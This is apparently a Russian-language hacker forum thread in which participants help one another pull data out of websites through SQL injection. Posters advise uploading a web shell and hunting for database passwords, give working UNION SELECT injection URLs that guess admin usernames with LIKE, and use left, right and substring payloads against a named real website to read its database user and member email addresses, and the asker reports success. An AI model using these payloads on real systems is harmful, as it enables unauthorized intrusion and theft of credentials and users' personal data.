>и записывать через into outfile

Залей шел например ачатовский :-)
И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL

Limit() не канает?

Был такой случай
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.

Ну если тебе надо выдрать допусить логин пасс админа из бд.

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin/*

тебе выводит admin

ты дальше юзаешь такую фишку как LIKE

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'admini%'/*
если вывелось admin то значет там еще есть буковка i

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'administrator%'/*

Если выводиться admin то в базе записанно administrator так же со всеми другими данными.

вопрос вроде по другому звучал?

1. что есть "limit()", новая функция?
2. зачем лезть, если не понимаешь сути вопроса? молчание - золото..

p-range, 6 глава мануала по мускулу рулит
http://downloads.mysql.com/docs/refm...ml-chapter.zip
left(str,len)
right(str,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,left(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,right(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
a вообще универсальная это substring(str,pos,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,substring(user(),3,14),3,4,5,6, 7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
substring('antichat',2,6) выведет tich

__________________
ПИУ-ПИУ...

согласен, не вкурил изначально в суть вопроса.

сайт пока в дауне... =\ попробую позже, в любом случае всем спасибо за помощь

сайт наконецто работает) спасибо всем за ответы. использовал substring(), все получилось